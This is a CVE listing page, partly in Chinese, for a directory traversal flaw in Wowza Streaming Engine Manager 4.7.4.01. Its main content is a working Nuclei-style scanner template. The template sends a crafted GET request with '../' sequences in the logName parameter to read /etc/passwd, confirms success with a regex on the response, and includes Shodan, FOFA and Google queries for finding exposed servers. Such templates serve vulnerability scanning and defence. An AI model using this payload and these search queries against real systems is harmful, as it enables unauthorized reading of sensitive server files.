CVE-2018-19365: Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal

日期: 2025-08-01 | 影响软件: Wowza Streaming Engine Manager | POC: 已公开

漏洞描述

Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request to the REST API.

PoC代码[已公开]

id: CVE-2018-19365

info:
  name: Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal
  author: 0x_Akoko
  severity: critical
  description: Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request to the REST API.
  impact: |
    An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or disclosure of sensitive information.
  remediation: |
    Upgrade to the latest version of Wowza Streaming Engine Manager or apply the necessary patches to fix the directory traversal vulnerability.
  reference:
    - https://blog.gdssecurity.com/labs/2019/2/11/wowza-streaming-engine-manager-directory-traversal-and-local.html
    - https://nvd.nist.gov/vuln/detail/CVE-2018-19365
    - https://raw.githubusercontent.com/WowzaMediaSystems/public_cve/main/wowza-streaming-engine/CVE-2018-19365.txt
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 9.1
    cve-id: CVE-2018-19365
    cwe-id: CWE-22
    epss-score: 0.79294
    epss-percentile: 0.99043
    cpe: cpe:2.3:a:wowza:streaming_engine:4.7.4.0.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: wowza
    product: streaming_engine
    shodan-query:
      - http.title:"manager" product:"wowza streaming engine"
      - cpe:"cpe:2.3:a:wowza:streaming_engine"
    fofa-query: title="manager" product:"wowza streaming engine"
    google-query: intitle:"manager" product:"wowza streaming engine"
  tags: cve2018,cve,wowza,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a0046304402204373cb80c1ef5cb382a17716186f0297b343442e620d1bb11b0dfd6065de35ac022027e9087a77f8ce85bc10888fa238d9272afb2a06458a9621e881284928a52591:922c64590222798bb761d5b6d8e72950

相关漏洞推荐